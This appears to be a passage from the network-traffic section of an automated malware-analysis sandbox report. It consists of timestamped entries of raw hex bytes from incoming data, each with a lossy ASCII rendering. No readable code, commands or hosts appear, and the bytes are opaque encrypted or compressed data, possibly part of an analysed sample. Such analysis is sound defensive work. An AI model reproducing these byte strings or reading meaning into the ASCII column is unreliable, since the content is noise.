                                                                                  2022-05-02 11:03:03 UTC1237INData Raw: de fd 4c 63 e4 bd aa 31 cc 6f d6 3e 1c cd 07 4c 14 48 97 02 52 92 8e a2 7f ee 3b 74 c9 c0 27 f7 20 dc 73 b9 5a ff 04 db 51 e3 b8 93 fb a6 81 b0 21 63 19 c6 52 98 58 0a bf b1 ec 49 2a 6f 3b e3 ad b6 a6 a0 9c c3 a1 d2 30 02 16 83 a7 d6 cb f0 10 24 11 c7 2d 36 d1 13 e7 d9 8d 21 f7 60 ab 86 e6 f9 2a 84 84 29 76 0f b1 39 38 e4 57 d6 7a ff d0 23 2e 9f 26 ef 0f 8c a8 c5 1c 9c aa 8c 3c 39 a8 51 43 61 9d 91 a6 b1 42 8f 0e 14 6a f5 20 7e dd d5 57 20 3f 03 ea 56 a6 22 28 6b 5d bc ba 64 90 7e 31 76 49 64 e7 43 9e 79 4a 02 04 54 7f ae 39 36 e0 41 06 57 7d 5f 59 c0 8d 91 39 c2 4c 20 8d e2 7d f0 ea 05 55 e2 43 cb 83 9b d1 1f cb 80 2e 9a d7 d1 78 79 36 64 cb 5b 9f 5b ae 4f 05 40 5f 2a 8c 99 24 31 4e dd 2a ea b2 ac 61 a1 2a b6 a3 da 57 a9 39 02 be 39 40 55 63 f0 c7 0a f1
                                                                                  Data Ascii: Lc1o>LHR;t' sZQ!cRXI*o;0$-6!`*)v98Wz#.&<9QCaBj ~W ?V"(k]d~1vIdCyJT96AW}_Y9L }UC.xy6d[[O@_*$1N*a*W99@Uc
                                                                                  2022-05-02 11:03:03 UTC1239INData Raw: f5 19 5f 22 57 b8 d3 31 56 f5 10 98 56 97 c4 67 a3 61 a4 b3 84 b6 01 4d 7c 6a c0 b9 84 7f 9b c4 5e 00 b0 f1 8c 9c f9 56 b0 0e 78 29 ef c6 3b ce 5d b7 2b 1f f8 40 62 7f ef 9c 59 f1 bc 4b 49 70 e4 86 4e 1a 23 b0 e9 a9 dc 0d 7f cc 33 4a a7 f9 7b 19 a1 11 57 82 cb 29 85 0d a5 6e 44 a7 96 ab 95 72 22 03 14 5a 72 6e b7 93 05 5f d4 76 dd 32 48 3d a1 54 22 d8 7a 5a 40 5a f8 a1 d2 32 e7 f3 3d cf 98 e9 1b f5 4d d9 c4 00 c6 10 5c 73 87 41 25 97 8f 25 3e 78 c8 b5 45 97 94 45 d4 26 86 3a 33 18 25 bd fd 70 28 82 31 ee a6 67 77 bd 1f 15 49 d1 5b e8 eb ec 54 84 b8 83 96 7e b0 4a 71 95 25 15 8b c5 0e fc d2 02 d5 27 ae 0d 35 1f 30 48 5e c2 2e 93 e8 0f 76 38 f3 09 10 7b 16 30 79 cd b9 42 23 2b 97 e6 11 8c 28 8e e9 fa b0 53 74 84 f7 a7 fa bd de b9 a2 d4 b4 5c 56 73 b8 4f c8
                                                                                  Data Ascii: _"W1VVgaM|j^Vx);]+@bYKIpN#3J{W)nDr"Zrn_v2H=T"zZ@Z2=M\sA%%>xEE&:3%p(1gwI[T~Jq%'50H^.v8{0yB#+(St\VsO
                                                                                  2022-05-02 11:03:03 UTC1240INData Raw: d5 10 6e fd 4b db bd 47 99 f4 6f 7f 3f 60 1c db f3 51 a4 65 9a 5b 43 f7 25 fc 63 34 4e ed ba f4 28 5f a9 32 60 68 e7 14 3a ba b0 e5 1c a0 fe 10 cb 5c 57 cd b8 90 65 38 30 d1 66 b3 39 b2 c1 47 dd f3 01 bb 2b 00 a1 ac 63 5e dd 35 52 03 5f 91 da e9 6b 6a 6e 31 7b 78 03 8e 6c 48 30 2b d1 2d b5 79 5d 7d da ab d5 ca 98 b2 66 08 1d 59 66 a9 b9 e5 5e 1f 9b 47 f9 a8 3d 83 e2 85 55 aa d2 93 d0 4c 23 e5 f5 a1 94 6c d2 24 a5 2b 1c 7a 9c 79 f0 29 f0 67 a4 a4 3d b7 48 e3 e8 ef e7 5e 94 54 7d 8f 86 9e 5c 30 da de 13 89 72 96 bd e3 39 4c c5 89 71 46 f5 16 dc a3 e0 ef 6d 67 95 20 b5 f0 21 28 87 9a 4a 15 c2 33 7b 85 c6 bf 66 64 85 37 31 c8 2c 6e 25 f3 b7 5a 67 de 7f fa fc ed 2b 0c d2 bf 64 dd 3a fe 8f 91 c4 93 df c4 5a 1d 83 d8 0e ac f3 46 28 58 d0 4c 0a a4 d3 42 9c 44 5f
                                                                                  Data Ascii: nKGo?`Qe[C%c4N(_2`h:\We80f9G+c^5R_kjn1{xlH0+-y]}fYf^G=UL#l$+zy)g=H^T}\0r9LqFmg !(J3{fd71,n%Zg+d:ZF(XLBD_
                                                                                  2022-05-02 11:03:03 UTC1241INData Raw: f3 ca 47 36 b9 f4 4c a7 3f f6 cb 12 4a c2 2d a7 da 18 5d dc 76 b3 ba c9 08 3b 20 b0 f3 0e 56 f0 c5 82 46 11 aa 69 99 92 cf d7 b9 18 f9 b4 9b 6e 2e 29 0e 86 74 46 7a 5f ad 05 4c fd 34 81 85 31 ba b5 1f da 5d 01 84 a9 c0 92 01 f5 65 34 12 c9 84 dc fa 1b 59 0a fc 9f d2 c1 08 4c 29 be f8 fa 49 5d f8 59 0d 1d 96 5f bc 9f d3 5b 82 de cb 37 0e 1e 78 e2 f4 e4 97 3a d3 8f e5 d4 92 74 6d 31 15 fe f7 65 0d db f2 66 aa af 5c b1 77 b9 9e 43 7b 0b 93 06 9a dd 34 22 9d 19 fa 37 f6 bc ba c0 04 2f 25 7e 99 71 a0 0f bb c0 ca 99 05 e0 cf 47 44 d5 40 5c 69 1d 04 bf 89 98 4d 15 f3 00 13 2c ce ce f0 cb d9 e9 49 62 5d 9c 37 36 32 56 4d 0e cd c7 0c 52 3d d6 8b 54 c5 3e 0e df 8b ba ad 9a c4 59 7e 87 76 cf 8a 99 42 b4 51 12 29 9c d1 ba 02 51 c3 8b b3 97 fa 32 e9 b8 b4 8f ef 3f 52
                                                                                  Data Ascii: G6L?J-]v; VFin.)tFz_L41]e4YL)I]Y_[7x:tm1ef\wC{4"7/%~qGD@\iM,Ib]762VMR=T>Y~vBQ)Q2?R
                                                                                  2022-05-02 11:03:03 UTC1243INData Raw: 55 54 7a 5c f2 8c af ac 12 b4 ea be ec c6 0f c9 ce d5 2f bc 9d aa 1d 07 ff bc 5c d7 eb 78 0e 9a f0 33 13 e3 74 a0 32 34 5a 25 7b ce 85 a5 45 13 dd 9d 0e af d0 87 be 52 32 f5 17 24 95 66 dc 7e bc ec 13 cc b8 66 1e 1b 67 ef cf 7e fa 5d b4 ea 5e 0e dd 4b 15 0d 0e e2 41 73 82 a6 94 60 b5 7a 81 7f 16 c5 12 9a 83 d7 e3 ec 5e 80 13 b3 a7 3b 44 71 75 5d b9 a7 80 23 87 bf 81 b3 e6 bf db 7d 8e b2 3e b7 1d 16 84 1a 9a 68 4a 04 6a ab 4f e6 1e 46 df 99 68 b8 48 7f 8d f6 37 2d 2d b4 19 49 1c 93 7f 74 b9 9d cd 75 f3 64 bb 3e 8e b9 27 74 36 77 fe d1 2f 6f 41 e6 d2 16 ec f0 73 87 26 c6 e7 c7 71 69 c6 5b 61 d8 ef c8 e6 9d ba 97 c6 82 20 90 fc 68 63 93 92 f4 50 16 4b 4b d9 ba dd 2e da 4e 60 e9 b2 45 13 77 5e 8c 40 6e a7 9b 57 2c e1 8e ed 88 b8 36 8e 60 8d 20 fe 45 d1 7f 1d
                                                                                  Data Ascii: UTz\/\x3t24Z%{ER2$f~fg~]^KAs`z^;Dqu]#}>hJjOFhH7--Itud>'t6w/oAs&qi[a hcPKK.N`Ew^@nW,6` E
                                                                                  2022-05-02 11:03:03 UTC1244INData Raw: ea 3e 93 bb b0 3e f8 8e c2 54 ef e8 e4 1d 77 7a 4e 87 cc 28 fa c4 d5 1d 71 a3 84 d6 d9 93 43 c7 5f d0 49 8a 2f 0a c3 14 00 2e bc ad 4f 39 1b 8e e8 f5 6d 46 a0 f4 bb a6 fc 95 60 c5 94 9d f1 8a 10 87 e2 91 91 db 75 82 b6 c2 b3 e0 a6 56 d9 a2 6c 8c 88 24 da 2e 98 96 17 fc cc e4 a1 3c 67 66 e4 55 9d 42 50 28 f1 b3 e3 c7 c8 90 ec ae f6 a4 61 5d 37 bb 6b 35 f2 32 0d 4b de ce 74 5d 84 ca 34 0e 1c 5a 81 28 ce fc 26 f0 02 20 f1 33 d8 b1 c8 a3 3a 2d b6 78 ba 12 40 5d a2 ce e2 14 89 c2 a2 50 cb 2f 87 32 c1 e9 8d 20 ce 99 e9 c8 5a 13 5c 6e d4 41 e0 da a5 51 37 4a dd 39 33 fb 8d 22 ed 26 d1 48 a6 9a bf 6f f6 a4 c8 db fe cc 46 0c af 1a b1 ec 85 ee 6a 57 ed 29 b7 c2 68 0f 6a cb 56 45 1b a7 c8 76 9d 7a a3 f6 eb 58 eb a0 df 31 16 a7 9c ae 53 65 7b 8c 97 ed 07 9b 05 1a ec
                                                                                  Data Ascii: >>TwzN(qC_I/.O9mF`uVl$.<gfUBP(a]7k52Kt]4Z(& 3:-x@]P/2 Z\nAQ7J93"&HoFjW)hjVEvzX1Se{
                                                                                  2022-05-02 11:03:03 UTC1245INData Raw: 22 2d 84 27 23 07 dd 6b a4 93 8f 0c f6 4c ae 16 15 ca 2e ec 86 30 aa f9 e6 47 eb 7f 7c 69 d4 49 8f 95 8d 9e bd 2d 05 f2 a2 6d 66 fd 9e ec 51 92 92 10 8f 25 84 c6 f4 5c 07 1a 73 05 c1 ad 85 aa 95 4b 4a 0b 25 f5 ed 38 52 86 85 be b4 99 0b c1 12 f1 9b 9a 96 28 2f 55 c4 16 9e 09 1b 7e 2b 98 ac d5 94 de 5a dd 6b 80 6f dd fd 41 1f 56 2a d1 c9 8f c8 e6 97 a6 46 e7 e2 fc e9 61 8b ac 78 81 eb 19 22 df 4c 80 7c 0b 6b ab 22 95 10 23 82 26 fa 9a 4d 47 a4 7a 31 25 a2 8b 21 ec f7 eb db 88 ab 9c 4c 89 3c 39 51 25 9b 35 b6 af b9 89 02 12 28 0c 55 cb 9d 93 3d 61 85 95 e9 77 fb ed 16 74 e3 1e c6 fa 9e c9 f7 76 69 f1 3a ad 4e 7f 53 a4 e5 6c ed fd 23 cf 72 64 d1 b5 f9 6f e0 75 1e f3 1c 16 e8 cd 10 69 9b ab 1e cf ca f0 2d e8 d3 0e b8 87 0c de ec 79 68 22 14 9a f0 bd 35 17 bc
                                                                                  Data Ascii: "-'#kL.0G|iI-mfQ%\sKJ%8R(/U~+ZkoAV*Fax"L|k"#&MGz1%!L<9Q%5(U=awtvi:NSl#rdoui-yh"5
                                                                                  2022-05-02 11:03:03 UTC1247INData Raw: 5c fe cb 83 ae 8f c9 6a 48 b8 6f a1 a9 de cf 93 b9 eb b9 a2 25 07 06 7c 1d 00 50 98 ba 18 e4 53 d4 a0 86 a3 dc 93 60 b5 57 a0 7f cd b1 d6 a8 ed 2d aa 1c b3 72 08 4f 60 f6 96 55 5f f5 06 4d 19 17 32 9a c7 94 68 8a a0 23 fd 5f 55 45 cf 2e a8 24 46 d0 0f d8 7e cd fe 45 c4 17 7a 96 7d 51 38 bc 7d ed 6a c1 72 ac 26 06 f6 6e 41 39 bd ac a6 cd fe 85 af e7 af 51 ac 05 24 fa 1a 83 08 23 4e 4c 13 2b d2 8b fa c8 13 3b 96 a3 ca 72 f1 bc 63 7c 69 e0 43 f6 63 cc f0 0e 47 c4 d6 91 2c 81 e7 78 bd f9 a0 77 bd 9d 80 97 b6 7b 48 1c 13 ea 64 e7 5e 44 a9 87 ad 53 b6 3c 66 e6 1a e1 44 db 4e 13 74 be 96 fb 6d 04 40 18 d8 d3 05 32 0f ef 9f ec c8 bf 0d 57 fd 2b 52 af 10 4d b8 ac 04 70 6d 5d ad e9 78 2a 41 92 87 2c 8c 22 d4 78 0c 46 57 4e 33 72 d6 4b 84 d0 a1 eb fa a8 f9 46 9a c5
                                                                                  Data Ascii: \jHo%|PS`W-rO`U_M2h#_UE.$F~Ez}Q8}jr&nA9Q$#NL+;rc|iCcG,xw{Hd^DS<fDNtm@2W+RMpm]x*A,"xFWN3rKF
                                                                                  2022-05-02 11:03:03 UTC1248INData Raw: 4b 57 48 b3 51 62 26 a9 18 75 d8 99 5e c0 53 06 93 8b f7 57 4c b3 04 e8 fe aa 49 a3 80 94 2c 79 30 37 96 3b eb af 93 63 3f 44 de c4 a0 3a 25 c8 5e 80 82 29 81 36 58 52 0d 76 6e eb 0c b1 02 b8 cc ea 49 04 33 ac e5 8d c8 be c7 89 66 f4 71 31 4d 55 df bf eb 83 79 1a aa 73 60 37 e8 c6 75 81 28 16 6b 46 0d ef fd d1 4a bf 1b e1 bb 25 a4 87 15 eb 76 a0 7a 7b f3 d1 d1 ee c8 84 af 48 13 ee 65 24 fd d6 b6 ce 95 2b e2 f5 5a be 26 d6 8e 7e a6 73 92 a5 15 84 31 a3 4d ba 29 93 64 df 60 f8 78 62 6c c5 bc d0 ab 77 45 db 7a a6 e5 ac 39 e2 c7 a1 a7 4e e3 83 f0 3d f7 11 b5 22 8e 56 67 8f d3 97 55 a5 01 29 c5 62 54 77 22 bc 4b 07 a8 c4 8e cc 27 e3 92 05 04 44 33 e2 f4 86 0c 96 c8 80 58 d1 12 5a 2b ee 31 00 ca e1 43 d0 11 b4 97 b6 d3 bb cf 01 b1 4d f9 11 26 62 b5 94 7d e0 58
                                                                                  Data Ascii: KWHQb&u^SWLI,y07;c?D:%^)6XRvnI3fq1MUys`7u(kFJ%vz{He$+Z&~s1M)d`xblwEz9N="VgU)bTw"K'D3XZ+1CM&b}X
                                                                                  2022-05-02 11:03:03 UTC1249INData Raw: 19 f4 76 07 ee f6 dd 3c dd ae 75 ed 10 e4 99 33 3d 4c 63 62 cb 6b de 5e 5d b5 df 9e 40 3a 32 c0 79 62 ce 1e 48 c3 8a a2 f6 9f ef bd cb 6d 0e 9a c9 93 57 11 11 54 e8 fd d6 f4 f6 99 ad c9 4f 71 83 eb 97 b4 7f 06 c6 0f 43 4d a4 b3 49 40 a4 2f 71 c5 d2 eb 53 43 0d 4e cf d5 97 5e c0 49 73 41 f0 3e 30 b9 19 3a 76 39 a8 7b 0f 82 0e 7b 98 7c 13 22 6b ad 35 fe 91 cc c5 36 cc b4 d1 c7 12 bf be ac 34 d0 59 fc 7f b0 74 be 46 82 ad c9 fd 12 8c 0d 89 8a a0 90 2f 69 16 0c 58 61 4a 99 47 c4 0d b8 f0 ef db cf 86 87 c0 34 d2 c8 0b bf 0d a8 b9 1b 64 a4 94 b3 23 5d 7b 35 81 88 ad 93 f6 00 f4 b3 fe e5 94 3f c2 6f 0f 56 77 50 73 ac d4 bc 0a b2 df 63 c8 72 36 14 07 34 d5 d5 84 81 d2 57 78 a8 27 c5 27 a6 ad 95 8f c0 89 7c e9 8f bf 64 d6 ef 67 81 8c aa e1 19 30 ec c4 d6 af 71 9c
                                                                                  Data Ascii: v<u3=Lcbk^]@:2ybHmWTOqCMI@/qSCN^IsA>0:v9{{|"k564YtF/iXaJG4d#]{5?oVwPscr64Wx''|dg0q
                                                                                  2022-05-02 11:03:03 UTC1251INData Raw: 76 b0 f1 78 c6 47 f0 09 37 2c ac 01 4a 37 53 f7 fb 59 82 c6 b8 35 cb 45 07 4c 6e 51 7a c6 15 90 67 81 71 02 fe 46 57 13 3a 31 1d 65 1b 82 8d e4 dc 2e 1d b5 53 66 67 72 f8 24 39 98 c5 25 fe ed 63 99 c7 d2 bd 1e c0 18 83 fc 30 47 7a a2 22 64 59 d8 1c 06 ac 74 01 d4 63 e6 7b 16 c4 35 c3 0f aa d5 d9 bc 71 10 28 6b ae 5b 50 72 26 32 64 1b b6 3e b3 d8 8d 76 89 80 27 d1 68 eb 04 26 0c 65 b9 0b f8 50 0c 3c 51 0b e1 6d 30 ba fe 75 46 38 63 7f b1 12 8f 3d 9b 4a e0 9f c7 76 2d d5 35 59 20 ac f5 76 b7 66 d7 89 32 3d ab 88 93 42 f6 42 0b d1 1a 5e 1c 44 79 ba 35 98 7c e2 84 83 ce e6 57 74 c7 0a 65 6b 0a e7 b6 0e c4 e2 0d e1 e1 a0 95 52 8e 8a 56 b7 2f 6a 6f d3 23 47 65 28 f8 b5 f1 52 62 f0 b0 4c e6 8b 38 8f 3f 78 4b fa 65 12 0e c6 a3 9c 69 e8 dd a1 e8 99 a8 aa 6a 0c 64
                                                                                  Data Ascii: vxG7,J7SY5ELnQzgqFW:1e.Sfgr$9%c0Gz"dYtc{5q(k[Pr&2d>v'h&eP<Qm0uF8c=Jv-5Y vf2=BB^Dy5|WtekRV/jo#Ge(RbL8?xKeijd
                                                                                  2022-05-02 11:03:03 UTC1252INData Raw: 70 6c 91 74 43 c4 b5 c2 46 b9 bc 7e 2b fb 28 48 9b 5b e1 1d fa 03 c9 d4 e6 a1 25 29 46 70 a6 c5 d8 ed f0 c9 8b 55 79 da 0e df ca 1f c2 39 75 cd 3d ab 1a 7d e2 f3 5d ab 24 42 22 d9 a1 a8 e4 66 5b 17 92 a2 4f d1 51 03 4a 97 1f 9b 04 b6 d6 6f 0b c9 c8 e2 fc f4 2d 2c 5b de 9b a8 05 29 83 dc 41 94 ea 4a bf 05 7b a5 c5 66 d3 27 0d fe d8 12 fe be 28 2e c6 f9 2a d9 a5 91 f1 64 5d 9b f3 8f 48 3a b4 64 11 90 7e 94 18 6b 0f da 0c 20 04 c2 91 a5 86 ed a9 3d a9 8a d5 81 a4 10 e8 3c 94 bf f0 61 02 83 20 02 8a 16 2d fd a6 af 06 2e 9e fe 87 70 50 15 77 bf 6d 6b 02 d7 cb 16 3d 72 3b 79 73 89 2f c3 60 a6 5d 12 20 43 79 01 3f 56 06 c1 2a 24 7d ed 78 0f b7 66 34 64 71 f7 0a 2b 86 87 9f 98 e2 05 c4 a3 49 10 16 af 96 33 d3 81 23 5a 52 46 d8 d4 b7 43 23 f4 79 ee d0 f4 7b b5 2e
                                                                                  Data Ascii: pltCF~+(H[%)FpUy9u=}]$B"f[OQJo-,[)AJ{f'(.*d]H:d~k =<a -.pPwmk=r;ys/`] Cy?V*$}xf4dq+I3#ZRFC#y{.
                                                                                  2022-05-02 11:03:03 UTC1253INData Raw: 21 59 60 5f 20 19 d5 5f bb b2 f6 f1 fb 68 e6 79 28 ab 27 28 fd d8 89 34 cd 54 79 2d 7f 03 e8 06 ff 13 ce 6e dd d4 5f 8d b0 4b 84 06 0d ab 93 6d 08 78 5a cf 8b a9 3a a7 42 e4 b1 91 2d ab 3c 6e 44 51 1b 0e 20 aa af ae 66 fe d0 7c 42 a0 8a af 57 5f 95 b8 ec c4 22 e8 2e 60 00 e5 16 f4 12 1d fc db da 9e 4e 21 33 2a 61 13 50 47 d1 15 a8 26 ee bf 22 f8 21 c8 cc 33 b7 23 ef 6f f0 48 24 75 6f 12 86 fe 00 fc f0 06 08 44 dc 29 0c 2e 7d df ac 19 3d 54 b7 2d 63 81 fc 46 8f ae 4e 80 24 4d 9a 9b 4a 2e 78 1d 2e 3f 5a 37 8f eb 6f 7c 4f 6a 50 34 7d 4b 1f 9a ee c5 25 1c 6c 3d d3 0b c6 c7 8f d2 08 e8 d2 5b 38 fa fc a1 4f 5d 34 d3 95 d3 b1 06 c5 f7 50 a3 6e da 35 b8 2c 67 27 90 86 b4 3c 50 30 c0 94 bc 72 bf c6 a1 f0 7d a6 af d4 e7 97 b2 b2 fb f2 82 7a 0b 1f 06 60 69 88 c9 bc
                                                                                  Data Ascii: !Y`_ _hy('(4Ty-n_KmxZ:B-<nDQ f|BW_".`N!3*aPG&"!3#oH$uoD).}=T-cFN$MJ.x.?Z7o|OjP4}K%l=[8O]4Pn5,g'<P0r}z`i
                                                                                  2022-05-02 11:03:03 UTC1254INData Raw: ba cd 43 28 a6 8f 26 c9 78 a9 67 4b 3b 08 2f 8d ba e2 64 44 43 28 d7 bc 5d 62 ad 65 a9 96 87 01 2b 0b b7 55 51 cb f5 af c5 6a 98 7f a9 81 eb 04 d9 56 8a 2b 0d e3 d0 ad a2 58 43 fe a4 fe a4 b4 ab f2 22 c7 77 4c 77 2e c2 6b e0 e2 58 4e 84 c5 f0 c0 81 78 ce 13 41 20 41 9f f8 2d 2d fe af 8f bc df cb b6 b5 3b 3d 40 8e 27 d8 c4 aa 1d 0f dd c3 af d6 cd bf b3 a7 a3 eb 24 dc 28 9e 5a 94 5e 7c db cd 10 57 fd 4f 93 91 76 dd c3 7d a7 41 fa dd ac 40 69 23 17 33 80 2a fe 95 05 e9 89 e1 f0 3d 3e 9c 29 ce fd 64 ef ad 77 b9 9d 21 fc d4 d7 f9 4c 3b 8a c0 2d 00 7e d8 3e f5 a3 9c 38 90 b9 ac 7e 2a 71 25 25 25 2d ac 53 94 75 0b 49 7b 6b 4e 72 e3 e0 0c b8 fe 7b 59 4f ac 01 bf d6 51 0b b7 59 98 9a 6b e2 9d c9 cc 05 5d 1f 6a 89 9e fe f7 42 57 a6 7a 06 7f a3 ce 87 e8 2c 28 b4 c9
                                                                                  Data Ascii: C(&xgK;/dDC(]be+UQjV+XC"wLw.kXNxA A--;=@'$(Z^|WOv}A@i#3*=>)dw!L;-~>8~*q%%%-SuI{kNr{YOQYk]jBWz,(
                                                                                  2022-05-02 11:03:03 UTC1256INData Raw: 09 9a 16 5b cd f1 de 5a d9 86 ad 42 e4 1a a4 92 dd 4a d8 05 d1 08 bd c9 ae 81 1f 78 a4 ba d3 62 e8 5d 98 e9 1e 43 4a 29 36 c0 1b f7 35 0c d9 39 7f 75 bf ef f2 78 31 7b 1f 4f 69 44 42 87 c2 5f ac 5c 65 3c 0f 02 e2 db 03 f2 8c ca f5 df 5d 82 89 bf db c4 14 22 41 c1 01 58 11 06 dd 55 b3 c4 2b 12 43 99 a8 58 40 a0 d2 2c 2a 79 40 8d ae e3 19 95 dd 84 ad 85 3a bb 85 71 00 3a 76 7d e7 49 37 14 0e 50 38 ec 4b 85 b0 84 f4 72 0c 67 2d eb c2 95 4e 5c e1 87 9b 99 d9 eb 6c b5 92 72 c9 c2 cf 2d fe 2f a7 98 36 ec 03 11 59 6b e2 50 ff 2c ec 1b 30 32 cb 73 90 25 96 db 7a 87 eb 88 eb 13 5e f9 d2 7c 81 8e e0 7b df ef 0f 76 98 2e 1b 35 eb f4 48 ba 28 3b 90 eb 02 e1 4e d3 ec 54 55 34 e8 db ff c2 52 3d 5c 4d 41 98 03 4a 78 fd 6f 52 0d 35 6b 25 5e b1 31 37 e0 e0 95 37 ac 87 ab
                                                                                  Data Ascii: [ZBJxb]CJ)659ux1{OiDB_\e<]"AXU+CX@,*y@:q:v}I7P8Krg-N\lr-/6YkP,02s%z^|{v.5H(;NTU4R=\MAJxoR5k%^177
                                                                                  2022-05-02 11:03:03 UTC1257INData Raw: 90 3c 1d 9a dc ad c4 8a d9 55 f8 57 9a af 4a 4a ec 65 19 78 eb 57 e6 9f 66 a4 63 c0 e4 21 f5 c9 6f 8e 08 d3 71 62 79 f6 0f c4 7d 05 51 8b 73 22 7f df 0e 39 47 20 89 4c 63 24 b4 a8 81 e9 c5 b0 97 a3 70 cd 85 8d 4d b0 45 47 51 df 1e cf d9 1f d2 29 6f f4 50 42 d1 d9 f8 4e 75 54 83 d8 45 a4 46 50 91 49 83 e5 42 e9 ec 83 36 c5 3b a7 18 34 2c 0c 0c e0 90 a5 85 f0 e8 ed 94 17 30 97 eb f3 56 5b a5 2c 90 51 d3 0e df c3 52 7e 57 d8 4a b8 8b 9f 68 65 35 be 5f 1f da ad a6 b0 f1 89 ef a6 25 58 e7 c9 3b 8f 24 2a b6 ca 73 8d 5e d6 05 b7 94 93 6b a5 65 fa c7 4f b8 f2 94 8c bf 90 91 be 23 67 53 39 ec ec 18 39 ca 8f c1 58 a6 6f a8 d8 46 d2 d5 da c4 33 dc 25 57 37 a7 95 4e 6b c7 ea 21 c4 7e ef 59 43 52 bb d3 f3 78 32 01 f7 df 0f b0 db 21 67 1e 71 1c 1a 25 8b 4a cd 48 7f 55
                                                                                  Data Ascii: <UWJJexWfc!oqby}Qs"9G Lc$pMEGQ)oPBNuTEFPIB6;4,0V[,QR~WJhe5_%X;$*s^keO#gS99XoF3%W7Nk!~YCRx2!gq%JHU
                                                                                  2022-05-02 11:03:03 UTC1258INData Raw: 69 04 c1 58 ac b4 8c 8c f6 36 1f d7 81 37 d9 55 23 6b 94 27 21 2f 64 d0 4e c9 09 31 a1 e7 6e cb 79 f0 27 45 66 8b b9 09 36 23 ac 49 4d c7 d0 b5 94 58 92 2b 0c 50 6f 53 fa 37 9e 7a c0 ea e7 a2 3c 1e d6 9a 99 31 5e b9 28 c3 f6 a9 20 9f 00 3c 7d f8 ea e8 5f bf e9 fd 93 79 87 21 75 b0 52 8f 38 60 51 fe 43 e3 18 95 e1 19 af a5 7f 58 bc 9b e8 d5 cc 5f 8b 7d 34 f5 23 ee 66 1f 52 af 06 12 bc cd 00 fb 54 1e a2 eb f7 4b f0 39 7a 5a 72 08 98 4b 50 43 c5 b4 83 89 9d 43 d3 4d b8 ce 3d b8 bc ec f3 8f db ee f2 ed fe c6 03 86 bd fd 30 21 0a a3 89 b9 be c3 f2 f4 8b f8 2c 4a 89 49 db c2 c7 7a 2b 44 c5 af 7d 10 c8 e2 7f a8 37 ac 8a a3 66 ab 46 b0 e1 75 7e 31 9e 52 19 34 02 cb 6f e6 4d d1 71 a2 47 74 2f 40 04 18 dc fc 80 4e 25 e8 09 c2 5e 8b cd 3f 9a 6a dc 97 f9 14 f3 6e ab
                                                                                  Data Ascii: iX67U#k'!/dN1ny'Ef6#IMX+PoS7z<1^( <}_y!uR8`QCX_}4#fRTK9zZrKPCCM=0!,JIz+D}7fFu~1R4oMqGt/@N%^?jn
                                                                                  2022-05-02 11:03:03 UTC1260INData Raw: bf 1e 6f 7a 04 fe ee f6 0e 65 a7 ca 08 aa db 84 85 1d 65 74 a9 77 57 5a 1b 2d 86 44 19 5e bd 0a 9e 20 76 da a1 6e 55 ea d5 4b 61 dd b9 3c 14 0e b0 f2 07 27 0a b9 e6 c9 7c 58 97 f9 82 8c 8b e9 7a 57 4b ba 0c d4 dc dd 94 c5 56 1f d7 bb 03 36 6d e9 f1 61 05 74 ed 4e ff b8 fd bb d0 d8 10 93 2c a5 e8 82 b8 62 a1 01 37 5c 9b 23 a5 1c 9c 63 18 f2 e0 73 ba fc ca f1 9c 36 e8 7b 18 00 6d b6 6e 34 ec 51 00 7b 82 ba df af 80 a4 11 ba 9d e9 61 2f 05 f5 0b 63 af 31 ab 7e 1e d6 8c cb 47 f9 fe 8f 29 5a d1 85 d3 af 41 d8 6f 55 c9 cf c2 5e c0 c8 90 2c 29 f0 00 40 04 89 37 be c1 48 97 aa 6e 13 d9 74 50 b9 92 c8 61 87 25 10 7f 3e 36 c2 84 80 a9 5f 90 37 f5 32 c6 95 f2 71 10 a2 be 65 40 ba b2 7f 01 5c 18 9f 80 53 8c d7 bb c0 da 4d 26 fa fa b6 e9 1a 19 87 9c e0 cd db a7 a8 cc
                                                                                  Data Ascii: ozeetwWZ-D^ vnUKa<'|XzWKV6matN,b7\#cs6{mn4Q{a/c1~G)ZAoU^,)@7HntPa%>6_72qe@\SM&
                                                                                  2022-05-02 11:03:03 UTC1261INData Raw: e3 57 f0 4b 53 48 b1 d8 ae ba bc 84 2a 0f 54 94 21 3d 7a db 22 3b 2f ef cb dc 61 b0 75 df 9e f3 2b cb 6f b1 36 2c 25 cd 17 dd f5 f1 0a 53 cf 5f a7 d8 aa 68 68 1f ee 86 8a 46 39 c2 9a 90 c3 e4 19 46 c5 98 a8 59 12 81 bf a1 ee cf dd 03 a4 fa e6 07 8b 62 54 73 5e 99 b3 c9 4f 85 dd 63 cf e0 0c 62 83 b0 0d 8f 86 be 8a 8a 10 e9 c9 8b 21 60 90 2e dd 89 66 78 62 63 d6 f8 b1 6b 02 35 5e a5 84 dc a8 1b 65 1d 8e e6 10 48 e3 f2 2f 5b 0d 18 cd 62 96 67 fe 09 1d 0a 79 0a c5 64 70 ed 00 30 34 77 84 98 ef c5 f9 50 14 9b 21 5f 1a d2 f0 53 d8 f8 55 b8 0b a2 3a 14 99 71 3f c6 1f 10 6e cb 24 74 5c f4 2f 4e 85 a4 e4 ba 39 dc 51 be 3c f6 77 6d fe d5 67 b1 f8 01 10 0a 70 6e 74 8f 83 fa 4f 1c 1b 19 f7 f6 38 31 b8 0d 7e b6 00 af e6 cc 92 b4 7f 00 8c dd 11 3b 05 d2 bd 34 2b f1 84
                                                                                  Data Ascii: WKSH*T!=z";/au+o6,%S_hhF9FYbTs^Ocb!`.fxbck5^eH/[bgydp04wP!_SU:q?n$t\/N9Q<wmgpntO81~;4+
                                                                                  2022-05-02 11:03:03 UTC1262INData Raw: 59 b0 a6 a7 36 cd 35 6e 8d 33 73 71 ec bf b5 4c c2 92 2f d0 0c b0 2e db 5b 51 bd dc 83 bc 4c fe b3 7f 5b 81 fa 2c d2 96 b9 96 5f 6b 01 64 bd 3f 6d 02 dc b4 4d ce 78 e7 62 bd 4c c6 ec 33 b4 a0 78 31 b8 dc 84 40 3c 75 fc 57 21 34 69 c7 fd 70 bf d1 8f 34 3f aa 73 f1 2a 75 ef 18 f9 1d 1a b1 82 9a 10 45 8f 7e 6c 82 70 d2 f9 07 6f 63 52 dd f6 01 49 ab 02 a4 21 91 09 17 ff 0e 7b 1a 25 c0 00 3b bd 64 df 7a 5e be af fb 2f ad c6 15 e6 43 5b 38 b1 98 a0 2d 91 c2 9f 86 42 0e 82 8e 23 ec 07 16 f1 bd 61 26 27 ed 81 4c 13 31 e0 a0 90 25 9a 3e 06 fe f9 de 62 66 ba e5 70 8d 96 df be 15 77 46 42 44 f0 88 d6 5b 50 5c e1 8d e5 f7 61 e5 25 69 c2 e8 97 1c 91 c7 4a 5f ab c3 